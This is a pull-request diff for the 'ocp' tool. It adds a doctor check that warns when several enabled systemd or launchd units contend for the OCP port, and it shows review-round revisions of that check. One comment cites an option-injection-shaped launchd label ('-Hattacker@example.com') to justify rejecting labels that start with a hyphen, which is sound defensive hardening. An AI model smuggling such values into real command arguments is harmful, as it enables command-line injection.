### PR TITLE
feat(doctor): warn on multiple enabled units racing for the OCP port

### DIFF
--- a/ocp
+++ b/ocp
@@ -797,6 +797,15 @@ cmd_update() {
   # doctor's WARN-level checks (e.g. "tree at X, service serving Y — restarting") never reached
   # the person running `ocp update`, even though doctor.mjs computed the exact message #214
   # asked for. Surface any WARN check here, generically, before dispatching on kind.
+  #
+  # #230 review finding (MED-5 recurrence): this filter was WARN-only, so doctor.mjs's
+  # multi_unit_boot_race INFO line (pushed when the boot-race check ran but couldn't reach a
+  # verdict — e.g. `sudo ocp update` on a host whose OCP is a system unit, where sudo's
+  # env_reset strips XDG_RUNTIME_DIR/DBUS_SESSION_BUS_ADDRESS and breaks `systemctl --user`)
+  # was visible on `ocp doctor` (which prints every check regardless of level) but silently
+  # absent from `ocp update` — the exact #214 discarded-check defect recurring one level up.
+  # INFO gets its own glyph (not reused WARN styling) so the two severities stay visually
+  # distinct to the operator.
   if [[ -n "$doctor_json" ]]; then
     echo "$doctor_json" | python3 -c "
 import sys, json
@@ -805,8 +814,11 @@ try:
 except Exception:
     sys.exit(0)
 for c in d.get('checks', []):
-    if c.get('level') == 'WARN':
+    level = c.get('level')
+    if level == 'WARN':
         print(f\"⚠ {c.get('message', '')}\")
+    elif level == 'INFO':
+        print(f\"ℹ {c.get('message', '')}\")
 " 2>/dev/null
   fi
 

--- a/ocp
+++ b/ocp
@@ -806,9 +806,21 @@ cmd_update() {
   # absent from `ocp update` — the exact #214 discarded-check defect recurring one level up.
   # INFO gets its own glyph (not reused WARN styling) so the two severities stay visually
   # distinct to the operator.
+  #
+  # #230 review round 4 (LOW-2): under `set -euo pipefail` (see top of this file), a non-zero
+  # exit from this python pipeline kills `cmd_update` immediately, and `2>/dev/null` hides why.
+  # Verified directly: `env -i LC_ALL=C PYTHONUTF8=0 bash` on the pre-fix block exits 1 (a
+  # UnicodeEncodeError trying to print "⚠"/"ℹ" under the C locale's ASCII-only stdout encoding),
+  # silently aborting the whole update before it even reaches the kind dispatch below. Pre-
+  # existing since #214 (the WARN-only version had the same exposure), but this PR's own INFO
+  # addition makes the block fire far more often — it used to print nothing on most healthy
+  # hosts. sys.stdout.reconfigure(errors="replace") makes stdout tolerant of an unencodable
+  # glyph (degrades to "?" instead of raising) without changing 2>/dev/null's existing behavior
+  # for any OTHER failure mode. Verified fixed under the same env -i reproduction.
   if [[ -n "$doctor_json" ]]; then
     echo "$doctor_json" | python3 -c "
 import sys, json
+sys.stdout.reconfigure(errors=\"replace\")
 try:
     d = json.load(sys.stdin)
 except Exception:

--- a/scripts/doctor.mjs
+++ b/scripts/doctor.mjs
@@ -86,12 +86,13 @@ function semverCompare(a, b) {
 //
 // KNOWN LIMITATION (review round 3 on #230, discretionary): grouping by port
 // alone means two units bound to distinct, SPECIFIC, non-wildcard addresses on
-// the same port (e.g. 127.0.0.1:3456 and 192.168.1.5:3456) will warn even
-// though they don't actually contend — each can bind its own address without
-// colliding. This is a deliberate false-positive-tolerant tradeoff, not an
-// oversight: distinguishing "genuinely non-contending" from "contends because
-// at least one side is a wildcard (0.0.0.0/::/unset)" reliably requires
-// knowing this host's real default-bind semantics when CLAUDE_BIND is unset,
+// the SAME port (e.g. one on loopback and another on a specific LAN address)
+// will warn even though they don't actually contend — each can bind its own
+// address without colliding. This is a deliberate false-positive-tolerant
+// tradeoff, not an oversight: distinguishing "genuinely non-contending" from
+// "contends because at least one side is a wildcard (0.0.0.0/::/unset)"
+// reliably requires knowing this host's real default-bind semantics when
+// CLAUDE_BIND is unset,
 // which this check does not attempt to model. Accepted as a rare, WARN-only
 // (never FAIL) false positive rather than adding that inference.
 //

--- a/scripts/doctor.mjs
+++ b/scripts/doctor.mjs
@@ -33,6 +33,285 @@ function semverCompare(a, b) {
   return A.patch - B.patch;
 }
 
+// ═══════════════════════════════════════════════════════════════════════════
+// Multi-unit boot-race pre-flight check (issue #220, incident #215)
+//
+// On a real host, a system-scope systemd unit (/etc/systemd/system/ocp.service,
+// bind 0.0.0.0) and a user-scope systemd unit (~/.config/systemd/user/
+// ocp-proxy.service, bind 127.0.0.1) were BOTH enabled and BOTH pointed at the
+// same server.mjs working tree and the same port, with drifted config. Whichever
+// won the boot race silently decided the host's LAN reachability. Nothing in
+// `ocp doctor` surfaced this; it was found by hand while diagnosing an unrelated
+// update failure. See issue #215 for the live evidence table.
+//
+// Relationship to scripts/lib/restart-unit.mjs (PR #221, issue #215's OTHER
+// half): that module resolves which unit CURRENTLY owns the port from LIVE
+// process/cgroup state (ss/lsof + /proc/<pid>/cgroup) for the upgrade restart
+// phase — a live-PID question. This check answers a different, STATIC question
+// — which units WOULD start at boot, and are any two of them configured to
+// collide — by reading unit-file config (`systemctl show` ExecStart/Environment,
+// or plist content on macOS), never a live PID. No logic is shared or
+// duplicated between the two; this module intentionally does not import
+// restart-unit.mjs. See the PR body for the explicit dependency decision.
+//
+// WARN, never FAIL: scripts/upgrade.mjs's runUpgrade() pre-flight guard only
+// tolerates ready_to_upgrade=false for next_action.kind="fresh_install" — a
+// FAIL here would block every future `ocp update` on an affected host,
+// including the update that might fix the drift. The two units' config could
+// also legitimately differ for reasons this check cannot know (e.g. a
+// deliberate blue/green setup on a non-standard port) — WARN surfaces the
+// hazard without itself becoming a new outage vector.
+//
+// Enumeration strategy: matching on unit NAME is fragile (a host may name a
+// unit anything — the field incident's units were "ocp.service" and
+// "ocp-proxy.service", nothing guarantees that pattern elsewhere), so instead
+// every ENABLED unit's config is read and fingerprinted by whether its
+// ExecStart (Linux) / ProgramArguments (macOS) actually invokes server.mjs, and
+// from where. Two units only count as conflicting when they share BOTH the
+// resolved port AND the resolved working tree — matching the field incident's
+// own shape ("both pointed at the same working tree and the same port") and
+// deliberately excluding same-port-different-tree or same-tree-different-port,
+// neither of which is this failure mode.
+//
+// Cost: capped at 4 real subprocess spawns total regardless of host size (two
+// `list-unit-files` calls to enumerate enabled *.service names, then at most
+// one BATCHED `systemctl show` call per scope covering every candidate at
+// once — never one spawn per unit). A missing/erroring systemctl, or an
+// unreadable listing, degrades the WHOLE check to "unknown" (no push) rather
+// than a false all-clear or a crash — see classifyMultiUnitRisk's null-vs-""
+// discipline below, which mirrors restart-unit.mjs's own "ss returned nothing
+// we could parse" vs "ss never ran" distinction (ss/lsof there, systemctl here,
+// same reasoning: an absent/foreign-uid PID column silently degrades, and the
+// caller must not read that as "confirmed clean").
+// ═══════════════════════════════════════════════════════════════════════════
+
+const UNIT_NAME_RE = /^[A-Za-z0-9:_.@-]+\.service$/;
+// ARG_MAX / cost safety cap: past this many enabled *.service units in one scope,
+// a single batched `systemctl show <all names> ...` command line risks becoming
+// unwieldy for no real benefit (a host with 200+ enabled units enabling two OCP
+// installs specifically is not a realistic shape this check needs to chase) —
+// degrade to "unknown" for that scope rather than issuing an oversized command.
+const MAX_UNIT_CANDIDATES = 200;
+
+function extractEnabledServiceNames(listUnitFilesOutput) {
+  return String(listUnitFilesOutput)
+    .split("\n")
+    .map(l => l.trim())
+    .filter(Boolean)
+    .map(l => l.split(/\s+/)[0])
+    .filter(name => UNIT_NAME_RE.test(name)); // also excludes header/footer noise
+}
+
+function parseSystemctlShowBlocks(showOutput) {
+  if (!showOutput) return [];
+  return String(showOutput)
+    .split(/\n\s*\n/)
+    .map(block => {
+      const props = {};
+      for (const line of block.split("\n")) {
+        const idx = line.indexOf("=");
+        if (idx === -1) continue;
+        props[line.slice(0, idx)] = line.slice(idx + 1);
+      }
+      return props;
+    })
+    .filter(p => p.Id);
+}
+
+// Fingerprint one `systemctl show` property block as an OCP server.mjs unit, or
+// null if it plainly isn't one. ExecStart's structured form from `systemctl show`
+// looks like "{ path=... ; argv[]=/usr/bin/node /home/opc/ocp/server.mjs ; ... }" —
+// pull argv[] out of that if present, else fall back to treating the whole
+// property as the argv string (keeps this tolerant of older systemd's plainer
+// ExecStart rendering rather than hard-requiring the structured form).
+function fingerprintSystemdUnit(props, scope) {
+  if (!UNIT_NAME_RE.test(props.Id || "")) return null; // never trust an unvalidated Id downstream
+  const execStart = props.ExecStart || "";
+  const argvMatch = execStart.match(/argv\[\]=([^;]+)/);
+  const argv = (argvMatch ? argvMatch[1] : execStart).trim().split(/\s+/).filter(Boolean);
+  const serverArg = argv.find(a => a === "server.mjs" || a.endsWith("/server.mjs"));
+  if (!serverArg) return null; // not an OCP unit — doesn't invoke server.mjs at all
+  const workingTree = serverArg === "server.mjs" ? "" : serverArg.slice(0, -"/server.mjs".length);
+
+  const env = props.Environment || "";
+  const portMatch = env.match(/CLAUDE_PROXY_PORT=(\S+)/);
+  const port = portMatch ? portMatch[1].replace(/^"|"$/g, "") : String(DEFAULT_PORT);
+  const bindMatch = env.match(/CLAUDE_BIND=(\S+)/);
+  const bind = bindMatch ? bindMatch[1].replace(/^"|"$/g, "") : "(default bind)";
+
+  return { name: props.Id, scope, port, workingTree, bind };
+}
+
+// macOS equivalent. setup.mjs only EVER writes one LaunchAgent
+// (~/Library/LaunchAgents/dev.ocp.proxy.plist) and never a LaunchDaemon, so the
+// structural precondition for this race (two independently-enabled auto-start
+// definitions) is far less likely to arise from OCP's own tooling here than on
+// Linux, where a hand-rolled system-scope unit is exactly what the field
+// incident found. It is not impossible — an operator can hand-create a second
+// LaunchAgent or a system LaunchDaemon pointing at the same server.mjs — so
+// this still checks rather than silently skipping the platform.
+//
+// plistBlob is a single pre-concatenated blob (one shell command, see
+// gatherUnitCandidates) with each file's content prefixed by a
+// "===OCP-DOCTOR-FILE:<path>===" delimiter line, so the whole scan costs one
+// subprocess spawn regardless of how many plists exist.
+function parsePlistCandidates(plistBlob) {
+  if (!plistBlob) return [];
+  const parts = String(plistBlob).split(/^===OCP-DOCTOR-FILE:(.*)===$/m);
+  const units = [];
+  for (let i = 1; i < parts.length; i += 2) {
+    const path = (parts[i] || "").trim();
+    const content = parts[i + 1] || "";
+    if (!/<key>RunAtLoad<\/key>\s*<true\s*\/>/.test(content)) continue; // wouldn't auto-start
+    const argsBlock = content.match(/<key>ProgramArguments<\/key>\s*<array>([\s\S]*?)<\/array>/);
+    if (!argsBlock) continue;
+    const args = [...argsBlock[1].matchAll(/<string>([^<]*)<\/string>/g)].map(m => m[1]);
+    const serverArg = args.find(a => a === "server.mjs" || a.endsWith("/server.mjs"));
+    if (!serverArg) continue; // not an OCP unit
+    const workingTree = serverArg === "server.mjs" ? "" : serverArg.slice(0, -"/server.mjs".length);
+    const labelMatch = content.match(/<key>Label<\/key>\s*<string>([^<]*)<\/string>/);
+    const portMatch = content.match(/<key>CLAUDE_PROXY_PORT<\/key>\s*<string>([^<]*)<\/string>/);
+    const bindMatch = content.match(/<key>CLAUDE_BIND<\/key>\s*<string>([^<]*)<\/string>/);
+    const scope = path.includes("/LaunchDaemons/") ? "system" : "user";
+    units.push({
+      name: labelMatch ? labelMatch[1] : path,
+      scope,
+      port: portMatch ? portMatch[1] : String(DEFAULT_PORT),
+      workingTree,
+      bind: bindMatch ? bindMatch[1] : "(default bind)",
+    });
+  }
+  return units;
+}
+
+// Two-or-more units sharing BOTH port and working tree are the actual hazard
+// shape (see the module comment above); anything else — a lone OCP unit, or
+// two units that merely happen to share a port with a DIFFERENT tree, or the
+// same tree on a DIFFERENT port — is not this failure mode and must not warn.
+function groupAndAssessConflicts(units) {
+  if (units.length < 2) return { state: "clear" };
+  const groups = new Map();
+  for (const u of units) {
+    const key = `${u.port}::${u.workingTree}`;
+    if (!groups.has(key)) groups.set(key, []);
+    groups.get(key).push(u);
+  }
+  const conflicting = [...groups.values()].filter(g => g.length >= 2);
+  if (conflicting.length === 0) return { state: "clear" };
+  return { state: "warn", groups: conflicting };
+}
+
+// Pure classifier: parses already-gathered raw command/file output into a
+// verdict. Never shells out itself — mirrors restart-unit.mjs's
+// gather-vs-classify split so the decision logic is directly unit-testable
+// without a live systemd/launchd instance.
+//
+// raw.userShowOut / raw.systemShowOut (Linux) and raw.plistBlob (macOS) follow
+// a strict three-value discipline, same as restart-unit.mjs's ss/lsof/cgroup
+// probes: `null` means "could not gather this" (tool missing, command failed,
+// or too many candidates to probe cheaply — MAX_UNIT_CANDIDATES), `""` or a
+// real listing means "gathered successfully, here's what's there" (including
+// legitimately empty). `null` must never be read as "confirmed nothing found".
+export function classifyMultiUnitRisk(raw = {}) {
+  if (raw.platform === "darwin") {
+    if (raw.plistBlob == null) {
+      return { state: "unknown", reason: "could not enumerate LaunchAgents/LaunchDaemons" };
+    }
+    return groupAndAssessConflicts(parsePlistCandidates(raw.plistBlob));
+  }
+
+  if (raw.userShowOut == null || raw.systemShowOut == null) {
+    return {
+      state: "unknown",
+      reason: "systemctl unavailable, errored, or returned too many candidates for one or more scopes — cannot rule out a boot race",
+    };
+  }
+  const units = [
+    ...parseSystemctlShowBlocks(raw.userShowOut).map(p => fingerprintSystemdUnit(p, "user")),
+    ...parseSystemctlShowBlocks(raw.systemShowOut).map(p => fingerprintSystemdUnit(p, "system")),
+  ].filter(Boolean);
+  return groupAndAssessConflicts(units);
+}
+
+// Impure gathering layer: decides which commands run and folds every failure
+// mode (missing binary, non-zero exit, empty-but-valid output) into the
+// null/""/text discipline classifyMultiUnitRisk expects. `run` defaults to
+// real execSync in production; tests inject a fake runner that pattern-matches
+// on the command string — the exact shape PR #221's resolveRestartPlan uses,
+// adopted here specifically because that PR's review (MED-6) found the
+// UNTESTED impure layer was where the real defects hid, not the pure
+// classifier.
+export function gatherUnitCandidates(run, platform) {
+  if (platform === "darwin") {
+    let plistBlob;
+    try {
+      plistBlob = run(
+        `for f in "$HOME/Library/LaunchAgents"/*.plist /Library/LaunchDaemons/*.plist; do ` +
+        `[ -f "$f" ] && { echo "===OCP-DOCTOR-FILE:$f==="; cat "$f"; }; done 2>/dev/null`
+      );
+    } catch { plistBlob = null; }
+    return { platform, plistBlob };
+  }
+
+  let userListing, systemListing;
+  try {
+    userListing = run(`systemctl --user list-unit-files --type=service --state=enabled --no-legend --no-pager`);
+  } catch { userListing = null; }
+  try {
+    systemListing = run(`systemctl list-unit-files --type=service --state=enabled --no-legend --no-pager`);
+  } catch { systemListing = null; }
+
+  const userNames = userListing != null ? extractEnabledServiceNames(userListing) : [];
+  const systemNames = systemListing != null ? extractEnabledServiceNames(systemListing) : [];
+
+  let userShowOut = userListing == null ? null : "";
+  let systemShowOut = systemListing == null ? null : "";
+
+  if (userListing != null && userNames.length > 0) {
+    if (userNames.length > MAX_UNIT_CANDIDATES) {
+      userShowOut = null;
+    } else {
+      try {
+        userShowOut = run(`systemctl --user show ${userNames.join(" ")} -p Id -p ExecStart -p Environment --no-pager`);
+      } catch { userShowOut = null; }
+    }
+  }
+  if (systemListing != null && systemNames.length > 0) {
+    if (systemNames.length > MAX_UNIT_CANDIDATES) {
+      systemShowOut = null;
+    } else {
+      try {
+        systemShowOut = run(`systemctl show ${systemNames.join(" ")} -p Id -p ExecStart -p Environment --no-pager`);
+      } catch { systemShowOut = null; }
+    }
+  }
+
+  return { platform, userListing, systemListing, userShowOut, systemShowOut };
+}
+
+export function detectMultiUnitBootRace(opts = {}) {
+  const platform = opts.mockPlatform || process.platform;
+  const run = opts.run || ((cmd) => execSync(cmd, { stdio: ["pipe", "pipe", "pipe"], timeout: 5000 }).toString());
+  const raw = gatherUnitCandidates(run, platform);
+  return classifyMultiUnitRisk(raw);
+}
+
+// Actionable WARN text: names every conflicting unit, the difference that
+// matters (bind address — the field incident's actual LAN-reachability hazard),
+// and the operator fix used to resolve the real host (disable the stray unit;
+// the file is preserved, the fix is reversible).
+function describeMultiUnitConflict(groups) {
+  return groups.map(group => {
+    const port = group[0].port;
+    const names = group.map(u => `${u.scope}-scope "${u.name}" (bind ${u.bind})`).join(" and ");
+    const userUnit = group.find(u => u.scope === "user");
+    const disableHint = userUnit
+      ? `disable the stray one — e.g. "systemctl --user disable ${userUnit.name}" (reversible: the unit file is preserved, only the boot-enable link is removed)`
+      : `disable whichever is not your intended target — e.g. "systemctl disable <unit>" (reversible: the unit file is preserved)`;
+    return `${group.length} enabled units target OCP port ${port}: ${names} — boot race: whichever starts first wins the port and the other silently orphans (issue #215). Pick one and ${disableHint}.`;
+  }).join(" | ");
+}
+
 export async function runDoctor(opts = {}) {
   const checks = [];
   const push = (id, level, message, extra = {}) =>
@@ -132,6 +411,23 @@ export async function runDoctor(opts = {}) {
       if (typeof health.body.version === "string" && semverParts(health.body.version)) {
         serviceVersion = health.body.version;
       }
+    }
+  }
+
+  // --- multi-unit boot-race pre-flight (issue #220 / incident #215) ---
+  // Gated by skipNetwork like the health/oauth block above — this reads the live
+  // systemd/launchd environment (not "network" in the curl/git sense, but the same
+  // "don't touch anything live" contract skipNetwork already exists to express in
+  // tests). Only pushed when there's a confirmed conflict to report — "clear" and
+  // "unknown" both push nothing, mirroring service_version_matches_tree's own
+  // "no check id at all when there's nothing warn-worthy" convention elsewhere in
+  // this file. See the module comment above classifyMultiUnitRisk for the full
+  // design rationale (why WARN not FAIL, why port+workingTree must both match,
+  // why this doesn't depend on scripts/lib/restart-unit.mjs).
+  if (!opts.skipNetwork) {
+    const multiUnit = detectMultiUnitBootRace(opts);
+    if (multiUnit.state === "warn") {
+      push("multi_unit_boot_race", "WARN", describeMultiUnitConflict(multiUnit.groups));
     }
   }
 

--- a/scripts/doctor.mjs
+++ b/scripts/doctor.mjs
@@ -84,6 +84,17 @@ function semverCompare(a, b) {
 // in the WARN message (same tree vs different trees) to help diagnose the
 // hazard, but no longer gates whether it fires.
 //
+// KNOWN LIMITATION (review round 3 on #230, discretionary): grouping by port
+// alone means two units bound to distinct, SPECIFIC, non-wildcard addresses on
+// the same port (e.g. 127.0.0.1:3456 and 192.168.1.5:3456) will warn even
+// though they don't actually contend — each can bind its own address without
+// colliding. This is a deliberate false-positive-tolerant tradeoff, not an
+// oversight: distinguishing "genuinely non-contending" from "contends because
+// at least one side is a wildcard (0.0.0.0/::/unset)" reliably requires
+// knowing this host's real default-bind semantics when CLAUDE_BIND is unset,
+// which this check does not attempt to model. Accepted as a rare, WARN-only
+// (never FAIL) false positive rather than adding that inference.
+//
 // Cost: Linux — up to 4 real subprocess spawns total regardless of host size
 // (two `list-unit-files` calls to enumerate enabled *.service names, then at
 // most one BATCHED `systemctl show` call per scope covering every candidate at
@@ -111,7 +122,17 @@ const UNIT_NAME_RE = /^[A-Za-z0-9:_.@-]+\.service$/;
 // is to hand `ocp doctor` output to an AI agent, which can make a
 // command-injection-shaped string in that output actionable, not just
 // cosmetically broken.
-const LAUNCHD_LABEL_RE = /^[A-Za-z0-9_.@-]+$/;
+// Leading "-" is rejected (first char excludes it; interior/trailing "-" is still allowed for
+// labels like "...login-item-helper") even though review round 3 on #230 confirmed the CURRENT
+// renderings are already safe against an option-injection-shaped label: `buildDisableHint`
+// always emits the label as the TRAILING component of a `<domain>/<label>` token (never a
+// standalone argv word), and this regex already excludes "/" and whitespace, so a label like
+// "-Hattacker@example.com" can't break out of that token or split into extra shell words. That
+// safety property lives in buildDisableHint's two format strings, not in this validator — a
+// future rendering (e.g. `launchctl bootout <label>` with no `domain/` prefix) would reopen it.
+// Rejecting a leading "-" here costs nothing (no real launchd label starts with one) and removes
+// the dependency on that rendering detail entirely.
+const LAUNCHD_LABEL_RE = /^[A-Za-z0-9_.@][A-Za-z0-9_.@-]*$/;
 // Only these UnitFileState values mean "would actually start at boot" for the
 // purposes of this check. Defense in depth (review finding HIGH-2 on #230): a
 // mutation that deleted `--state=enabled` from the LISTING command survived
@@ -120,6 +141,18 @@ const LAUNCHD_LABEL_RE = /^[A-Za-z0-9_.@-]+$/;
 // PERMISSIVE when the property is absent (older systemd, or a caller that
 // didn't request it) — this is a second check, not the only one, and must not
 // newly reject unit shapes the primary --state=enabled filter already handled.
+//
+// NOTE on "enabled-runtime" (review round 3 on #230, discretionary observation):
+// `--state=enabled` at the LISTING stage is an EXACT string match, so it can
+// never itself surface an "enabled-runtime" unit (its enable-symlinks live
+// under /run and are runtime-only) — this allowlist entry is unreachable via
+// the normal gather path today, and "enabled-runtime" does NOT survive a
+// reboot, so admitting it here is more permissive than the strict "would
+// start at the NEXT boot" framing this check's name implies. Kept anyway,
+// deliberately: a runtime-enabled unit CAN be racing another enabled unit for
+// the port RIGHT NOW (a real, current hazard), just not a persistent one, and
+// keeping the allowlist correct for a future caller that lists by a broader
+// state filter costs nothing today.
 const UNIT_FILE_STATE_ALLOWLIST = new Set(["enabled", "enabled-runtime"]);
 // ARG_MAX / cost safety cap: past this many enabled *.service units in one scope,
 // a single batched `systemctl show <all names> ...` command line risks becoming
@@ -424,26 +457,51 @@ export function detectMultiUnitBootRace(opts = {}) {
 // "user"-scope one (matches the actual remediation used on the field-incident
 // host — the stray USER unit was disabled, the SYSTEM unit kept), else the
 // first unit encountered (deterministic: gather always processes scopes/
-// directories in the same fixed order).
+// directories in the same fixed order). ONLY called for the same-working-tree
+// case (see describeMultiUnitConflict below) — nominating a "stray" unit only
+// makes sense when both units are drifted config on ONE install; see MED-7.
 function pickDisableTarget(group) {
   return group.find(u => u.scope === "user") || group[0];
 }
 
-// Platform- and domain-aware remediation command (review finding MED-3.3 on
-// #230: the previous revision always printed a `systemctl` command, including
-// on macOS, where that binary does not exist).
+// Platform- and domain-aware remediation command for ONE unit (review finding
+// MED-3.3 on #230: the previous revision always printed a `systemctl` command,
+// including on macOS, where that binary does not exist). Factored out of the
+// old buildDisableHint so both the same-tree (nominates one target) and
+// different-tree (lists every unit's command, nominates none — see MED-7
+// below) message shapes can share it.
+function buildDisableCommand(unit) {
+  if (unit.platform === "darwin") {
+    return unit.domain === "system"
+      ? `sudo launchctl disable system/${unit.name}`
+      : `launchctl disable gui/$(id -u)/${unit.name}`;
+  }
+  return unit.scope === "user"
+    ? `systemctl --user disable ${unit.name}`
+    : `systemctl disable ${unit.name}`;
+}
+
+// Same-working-tree case: both units are drifted config on ONE install (the
+// field incident's own shape), so nominating the likely-stray one (preferring
+// user-scope, matching the real remediation used there) is reasonable.
 function buildDisableHint(group) {
   const target = pickDisableTarget(group);
-  if (target.platform === "darwin") {
-    const cmd = target.domain === "system"
-      ? `sudo launchctl disable system/${target.name}`
-      : `launchctl disable gui/$(id -u)/${target.name}`;
-    return `disable the stray one — e.g. "${cmd}" (reversible: the plist is preserved, only a persistent disable flag is set; undo with the same command substituting "enable" for "disable")`;
-  }
-  if (target.scope === "user") {
-    return `disable the stray one — e.g. "systemctl --user disable ${target.name}" (reversible: the unit file is preserved, only the boot-enable link is removed)`;
-  }
-  return `disable whichever is not your intended target — e.g. "systemctl disable ${target.name}" (reversible: the unit file is preserved)`;
+  const cmd = buildDisableCommand(target);
+  const reversibleNote = target.platform === "darwin"
+    ? `(reversible: the plist is preserved, only a persistent disable flag is set; undo with the same command substituting "enable" for "disable")`
+    : `(reversible: the unit file is preserved${target.scope === "user" ? ", only the boot-enable link is removed" : ""})`;
+  return `disable the stray one — e.g. "${cmd}" ${reversibleNote}`;
+}
+
+// Different-working-tree case (review finding MED-7 on #230): these are two
+// SEPARATE installs, not one install's drifted config, so nominating either
+// one as "the stray one" is a judgement this check has no basis for making —
+// it directly contradicts the PR's own stated principle ("does not assert
+// which of two conflicting units is correct"). Lists every unit's disable
+// command instead of picking one.
+function buildNeutralDisableHint(group) {
+  const options = group.map(u => `"${buildDisableCommand(u)}"`).join(" or ");
+  return `this check cannot tell which install you intend to keep — decide, then disable whichever you don't want: ${options} (reversible either way — the losing unit's file/plist is preserved)`;
 }
 
 // Actionable WARN text: names every conflicting unit, the difference that
@@ -455,11 +513,13 @@ function describeMultiUnitConflict(groups) {
   return groups.map(group => {
     const port = group[0].port;
     const trees = [...new Set(group.map(u => u.workingTree))];
-    const treeNote = trees.length === 1
-      ? ` (same working tree: ${trees[0] || "(unresolved)"})`
-      : ` — DIFFERENT working trees (${trees.map(t => t || "(unresolved)").join(" vs ")}): different code may be racing for this port, not just different config`;
     const names = group.map(u => `${u.scope}-scope "${u.name}" (bind ${u.bind})`).join(" and ");
-    return `${group.length} enabled units target OCP port ${port}${treeNote}: ${names} — boot race: whichever starts first wins the port and the other silently orphans (issue #215). Pick one and ${buildDisableHint(group)}.`;
+    if (trees.length === 1) {
+      const treeNote = ` (same working tree: ${trees[0] || "(unresolved)"})`;
+      return `${group.length} enabled units target OCP port ${port}${treeNote}: ${names} — boot race: whichever starts first wins the port and the other silently orphans (issue #215). Pick one and ${buildDisableHint(group)}.`;
+    }
+    const treeNote = ` — DIFFERENT working trees (${trees.map(t => t || "(unresolved)").join(" vs ")}): these are two SEPARATE OCP installs racing for the same port, not just drifted config on one install`;
+    return `${group.length} enabled units target OCP port ${port}${treeNote}: ${names} — boot race: whichever starts first wins the port and the other silently orphans (issue #215). ${buildNeutralDisableHint(group)}.`;
   }).join(" | ");
 }
 

--- a/scripts/doctor.mjs
+++ b/scripts/doctor.mjs
@@ -101,9 +101,10 @@ function semverCompare(a, b) {
 // most one BATCHED `systemctl show` call per scope covering every candidate at
 // once — never one spawn per unit; the extra `-p UnitFileState -p
 // EnvironmentFiles` properties added by this revision ride the SAME batched
-// call, zero extra spawns). macOS — 2 spawns (one enumerates every candidate
-// plist in one shell command; one reads `launchctl print-disabled` to exclude
-// units an operator has persistently disabled). A missing/erroring systemctl,
+// call, zero extra spawns). macOS — 3 spawns (one enumerates every candidate
+// plist in one shell command; two read `launchctl print-disabled` — gui/<uid>
+// and system, both unprivileged, verified — to exclude units an operator has
+// persistently disabled in either domain). A missing/erroring systemctl,
 // or an unreadable listing, degrades the WHOLE check to "unknown" — which now
 // pushes a low-severity INFO line (review finding MED-3.5) rather than nothing
 // at all, so "verified clear" and "couldn't verify" are distinguishable from
@@ -161,6 +162,18 @@ const UNIT_FILE_STATE_ALLOWLIST = new Set(["enabled", "enabled-runtime"]);
 // installs specifically is not a realistic shape this check needs to chase) —
 // degrade to "unknown" for that scope rather than issuing an oversized command.
 const MAX_UNIT_CANDIDATES = 200;
+
+// Review round 4 on #230 (LOW-3): distinguishes "systemctl doesn't exist on this host at all"
+// (a container, WSL without systemd, OpenRC, ...) from "systemctl exists but this particular
+// probe failed" (permission, timeout, transient error). Verified directly: when execSync is
+// given a full command STRING (this file's convention throughout), a missing binary is resolved
+// by the shell it spawns through, which exits 127 and reports "command not found" on stderr —
+// NOT a Node-level ENOENT on the execSync call itself (that only happens if the first execFile
+// argument is itself a missing path, not applicable here). `err.status === 127` is therefore the
+// portable, verified signal, independent of locale/shell.
+function isCommandNotFound(err) {
+  return !!err && err.status === 127;
+}
 
 function extractEnabledServiceNames(listUnitFilesOutput) {
   return String(listUnitFilesOutput)
@@ -291,22 +304,18 @@ function parsePlistCandidates(plistBlob) {
   return units;
 }
 
-// Parses `launchctl print-disabled gui/<uid>` into the set of labels an
-// operator has PERSISTENTLY disabled — real format (verified against a live
-// host): a `disabled services = { "<label>" => enabled|disabled ... }` block.
-// A RunAtLoad=true plist that's been `launchctl disable`d is inert (it will
-// NOT actually start), so warning about it would be a false positive — and
-// `launchctl disable` is the persistent, standard remediation a Mac operator
-// would reach for (the exact analogue of `systemctl --user disable` on
-// Linux). Best-effort: if disabledBlob couldn't be gathered, this returns an
-// empty set (nothing filtered) — permissive, not a reason to mark the whole
-// check "unknown", since RunAtLoad=true is already a sufficient positive
-// signal on its own and this is only a refinement that trims false positives
-// further. Scoped to the `gui/<uid>` domain only (covers every LaunchAgent
-// candidate, personal or system-wide-installed); a LaunchDaemon's disabled
-// state lives in the `system` domain, which requires root to query and is out
-// of scope for a read-only, unprivileged pre-flight probe — a documented,
-// deliberate limitation, not a silent gap (see the PR body).
+// Parses ONE `launchctl print-disabled <domain>` blob into the set of labels
+// an operator has PERSISTENTLY disabled in that domain — real format
+// (verified against a live host, both domains): a `disabled services = {
+// "<label>" => enabled|disabled ... }` block. A RunAtLoad=true plist that's
+// been `launchctl disable`d is inert (it will NOT actually start), so warning
+// about it would be a false positive — and `launchctl disable` is the
+// persistent, standard remediation a Mac operator would reach for (the exact
+// analogue of `systemctl --user disable` on Linux). Best-effort: if a blob
+// couldn't be gathered, this returns an empty set (nothing filtered from
+// THAT domain) — permissive, not a reason to mark the whole check "unknown",
+// since RunAtLoad=true is already a sufficient positive signal on its own and
+// this is only a refinement that trims false positives further.
 function parseDisabledLabels(disabledBlob) {
   const disabled = new Set();
   if (!disabledBlob) return disabled;
@@ -316,6 +325,24 @@ function parseDisabledLabels(disabledBlob) {
     if (m[2] === "disabled") disabled.add(m[1]);
   }
   return disabled;
+}
+
+// Union the gui/<uid> (LaunchAgents, personal or system-wide-installed) and
+// system (LaunchDaemons) disabled-label sets. Review round 4 on #230, false
+// claim correction: an earlier revision of this file claimed the system
+// domain "requires root to query" and left it unprobed as a "documented
+// limitation" — false (verified directly on a live host: uid 501, no sudo,
+// `launchctl print-disabled system` exits 0). The consequence was
+// self-inflicted: this file's OWN WARN recommends `sudo launchctl disable
+// system/<label>` for a LaunchDaemon conflict, so an operator who followed
+// that advice was warned about the same, now-disabled unit forever. Fixed by
+// probing both domains and filtering on the union.
+function unionDisabledLabels(...blobs) {
+  const union = new Set();
+  for (const blob of blobs) {
+    for (const label of parseDisabledLabels(blob)) union.add(label);
+  }
+  return union;
 }
 
 // Two-or-more units sharing the same PORT are the hazard (see the "Grouping
@@ -343,19 +370,28 @@ function groupAndAssessConflicts(units) {
 // many candidates to probe cheaply — MAX_UNIT_CANDIDATES), `""` or a real
 // listing means "gathered successfully, here's what's there" (including
 // legitimately empty). `null` must never be read as "confirmed nothing found".
-// raw.disabledBlob (macOS only) is best-effort and does NOT participate in
-// this discipline — see parseDisabledLabels above.
+// raw.disabledBlob / raw.systemDisabledBlob (macOS only) are best-effort and
+// do NOT participate in this discipline — see unionDisabledLabels above.
